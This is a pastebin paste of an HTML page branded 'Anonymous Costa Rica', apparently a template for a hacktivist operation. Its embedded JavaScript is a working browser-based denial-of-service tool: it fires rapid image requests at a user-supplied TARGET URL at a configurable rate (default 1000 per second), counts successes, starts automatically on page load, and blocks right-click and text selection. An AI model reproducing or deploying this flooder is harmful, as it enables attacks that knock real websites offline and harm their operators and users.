Don't like ads? PRO users don't see any ads ;-)
Guest

WEbHiveCR

By: a guest on Jul 11th, 2012  |  syntax: None  |  size: 6.74 KB  |  hits: 23  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. <html>
  2.  <!-- Anonymous Costa Rica -->    
  3.    
  4.   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5.  
  6.    <title>Anonymous Costa Rica</title>
  7.  
  8.      <meta name="description" content="Somos Anonymous Costa Rica..." />
  9.  
  10.       <meta property="og:image" content="http://gobblin.se/media/media_entries/4f1ccd687699ff458400004d/anoncr.png"/>
  11.  
  12.        <meta property="og:title" content="#Nombre de la OP TAG">
  13.  
  14.          <meta property="og:description" content="Anonymous Costa Rica">
  15.  
  16.            <meta property="og:type" content="website" />
  17.  
  18.                <head>
  19.  
  20.     <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  21.  
  22.   <hr />
  23.    <div class="row">
  24.       <div class="span16 columns">
  25.          <center>    </a>
  26.          </center>
  27.       </div>
  28.    </div>
  29.   </div>
  30.  </div> <!-- container -->
  31.  
  32.   <style type="text/css">
  33.  
  34.   body {
  35.  
  36.         background: url("http://wallpaper.goodfon.com/image/286948-1920x1200.jpg");
  37.  
  38.         background-repeat: repeat;
  39.  
  40.         background-position: right;
  41.  
  42.         background-attachment: fixed;
  43.  
  44.         margin-top: 5%;
  45.  
  46.         margin-bottom: 5%;
  47.  
  48.         margin-left: 15%;
  49.  
  50.         margin-right: 15%;
  51.  
  52.         font-family:"Courier New", Courier, monospace;
  53.  
  54.         color: #2f323b;
  55.  
  56.         }
  57.  
  58.   fieldset {
  59.  
  60.         border-style: none;
  61.  
  62.         margin: 10px;
  63.  
  64.         }
  65.  
  66.   p {
  67.  
  68.         margin: 0;
  69.  
  70.         }
  71.  
  72.   input {
  73.  
  74.         margin: 0;
  75.  
  76.         background-color: transparent;
  77.  
  78.         border: none;
  79.  
  80.         text-align: center;
  81.  
  82.         font-family:"Courier New", Courier, monospace;
  83.  
  84.         color: #10aad1;
  85.  
  86.         }
  87.  
  88.    </style>
  89.  
  90.   <script language="JavaScript">
  91.  
  92.   <!-- Disable
  93.  
  94.   function disableselect(e){
  95.  
  96.   return false
  97.  
  98.   }
  99.  
  100.   function reEnable(){
  101.  
  102.   return true
  103.  
  104.   }
  105.  
  106.   //if IE4+
  107.  
  108.   document.onselectstart=new Function ("return false")
  109.  
  110.   document.oncontextmenu=new Function ("return false")
  111.  
  112.   //if NS6
  113.  
  114.   if (window.sidebar){
  115.  
  116.   document.onmousedown=disableselect
  117.  
  118.    document.onclick=reEnable
  119.  
  120.  }
  121.  
  122.   //-->
  123.  
  124.   </script>
  125.  
  126.   </head>
  127.  
  128.   <body onLoad="type()" >
  129.  
  130.   <fieldset>
  131.  
  132.   <div id="title" align="center"><font size="+3" color="#FF0000">[#</font><font size="+3">Nombre de la OP</font><font size="+3" color="#FF0000">] </font></div><br><br>
  133.  
  134.   <div id="hive" align="center">
  135.  
  136.   <font color="#FF0000">[</font>TARGET<font color="#FF0000">]</font><br>
  137.  
  138.    <input name="target" id="target" size="100" value="     "><br><br>
  139.  
  140.      <font color="#FF0000">[</font>REQUESTS<font color="#FF0000">]</font><br>
  141.  
  142.       <input id="requests" size="100" value="1000"><br><br>
  143.  
  144.         <font color="#FF0000">[</font>MESSAGE<font color="#FF0000">]</font><br>
  145.  
  146.            <input id="message" size="100" value="Mensaje"><br><br>
  147.  
  148.               <font color="#FF0000">[</font>STATUS<font color="#FF0000">]</font><br>
  149.  
  150.                   REQUESTS <p id="requested">0</p>
  151.  
  152.                       SUCCEDED <p id="succeeded">0</p>
  153.  
  154.                            FAILED   <p id="failed">0</p><br>
  155.  
  156.     <button id="fire" style="background-color:#000000; border-color: rgb(255, 255, 255); color: rgb(255, 255, 255);"> STOP! </button><br><br><br>
  157.  
  158.     </div>
  159.  
  160.  
  161.      <script>
  162.  
  163.   (function () {
  164.  
  165.         var fireInterval;
  166.  
  167.         var isFiring = false;
  168.  
  169.         var currentTime = new Date();
  170.  
  171.         var lastSuccess = currentTime.getTime();
  172.  
  173.  
  174.  
  175.         var requestedNode = document.getElementById("requested"),
  176.  
  177.         succeededNode = document.getElementById("succeeded"),
  178.  
  179.         failedNode = document.getElementById("failed"),
  180.  
  181.         targetNode = document.getElementById("target"),
  182.  
  183.         fire = document.getElementById("fire"),
  184.  
  185.         messageNode = document.getElementById("message"),
  186.  
  187.         requestsNode = document.getElementById("requests"),
  188.  
  189.         timeoutNode = document.getElementById("timeout");
  190.  
  191.  
  192.  
  193.         var target = targetNode.value;
  194.  
  195.         targetNode.onchange = function () {
  196.  
  197.              target = this.value;
  198.  
  199.             };
  200.  
  201.  
  202.  
  203.         var requestsHT = {};
  204.  
  205.  
  206.  
  207.         var requested = 0,
  208.  
  209.         succeeded = 0,
  210.  
  211.         failed = 0;
  212.  
  213.  
  214.  
  215.         var makeHttpRequest = function () {
  216.  
  217.                 if ( (currentTime.getTime()-lastSuccess) > 10000) {
  218.  
  219.                         return;
  220.  
  221.                 } else {
  222.  
  223.                         lastSuccess = currentTime.getTime();
  224.  
  225.                 };
  226.  
  227.                                        
  228.  
  229.                 var rID =Number(new Date());
  230.  
  231.        
  232.  
  233.                 var img = new Image();
  234.  
  235.         img.onerror = function () { onFail(rID); };
  236.  
  237.         img.onabort = function () { onFail(rID); };
  238.  
  239.         img.onload = function () { onSuccess(rID); };
  240.  
  241.                 img.setAttribute("src", target + "?id=" + rID + "&msg=" + messageNode.value);
  242.  
  243.         requestsHT[rID] = img;
  244.  
  245.         onRequest(rID);
  246.  
  247.         };
  248.  
  249.  
  250.  
  251.         var onRequest = function (rID) {
  252.  
  253.             requested++;
  254.  
  255.             requestedNode.innerHTML = requested;
  256.  
  257.             };
  258.  
  259.  
  260.  
  261.         var onComplete = function (rID) {
  262.  
  263.             delete requestsHT[rID];
  264.  
  265.             };
  266.  
  267.  
  268.  
  269.         var onFail = function (rID) {
  270.  
  271.             // failedCtr++;
  272.  
  273.             //failedCtrNode.innerHTML = failedCtr;
  274.  
  275.                 succeeded++; //Seems like the url will always fail it it isn't an image
  276.  
  277.             succeededNode.innerHTML = succeeded;
  278.  
  279.                 delete requestsHT[rID];
  280.  
  281.             };
  282.  
  283.  
  284.  
  285.         var onSuccess = function (rID) {
  286.  
  287.             succeeded++;
  288.  
  289.             succeededNode.innerHTML = succeeded;
  290.  
  291.                     delete requestsHT[rID];
  292.  
  293.         };
  294.  
  295.  
  296.  
  297.         fire.onclick = function () {
  298.  
  299.                 if (isFiring) {
  300.  
  301.                         clearInterval(fireInterval);
  302.  
  303.                         isFiring = false;
  304.  
  305.                         this.innerHTML = "FIRE!";
  306.  
  307.                 } else {
  308.  
  309.                         isFiring = true;
  310.  
  311.                         this.innerHTML = "STOP!";
  312.  
  313.                         fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(requestsNode.value) | 0));
  314.  
  315.                         }
  316.  
  317.                 };
  318.  
  319.                        
  320.  
  321.         function start() {
  322.  
  323.                 if (isFiring) {
  324.  
  325.                         clearInterval(fireInterval);
  326.  
  327.                         isFiring = false;
  328.  
  329.                         this.innerHTML = "FIRE!";
  330.  
  331.                 } else {
  332.  
  333.                         isFiring = true;
  334.  
  335.                         this.innerHTML = "STOP";
  336.  
  337.                         fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(requestsNode.value) | 0));
  338.  
  339.                         }
  340.  
  341.                 };
  342.  
  343.   document.getElementById("target").value = "         ";
  344.  
  345.   start();
  346.  
  347.   })();
  348.  
  349.       </script>
  350.    </fieldset>
  351.   <center>
  352.  <hr />
  353.    <div class="row">
  354.       <div class="span16 columns">
  355.          <center><font color="Blue" face="System"<h3>Anon</b></h3></font><font color="White" face="System"<h3>ymo</b></h3></font><font color="RED" face="System"<h3>us Costa </b></h3></font><font color="White" face="System"<h3>Ri</b></h3></font><font color="Blue" face="System"<h3>ca</h3></font> </a>
  356.          </center>
  357.  
  358.      <footer id="homefooter" data-hires="true">
  359.                                 <div id="links">
  360.                                         <p class="left">Blog <a href="http://anoncostarica.wordpress.com/">anoncostarica</a>| Twitter <a href="https://twitter.com/anonymousCRI">anonymousCRI</a> - <a href="https://twitter.com/AnonCostaRica">AnonCostaRica</a>.</p>
  361.                                         </ul>
  362.                                 </div><!--/links-->
  363.       </div>
  364.    </div>
  365.     </div>
  366.      </div> <!-- container -->
  367.    </div>
  368.   </BODY>
  369.  </HTML>
  370.  
  371. <!-- Anonymous Costa Rica -->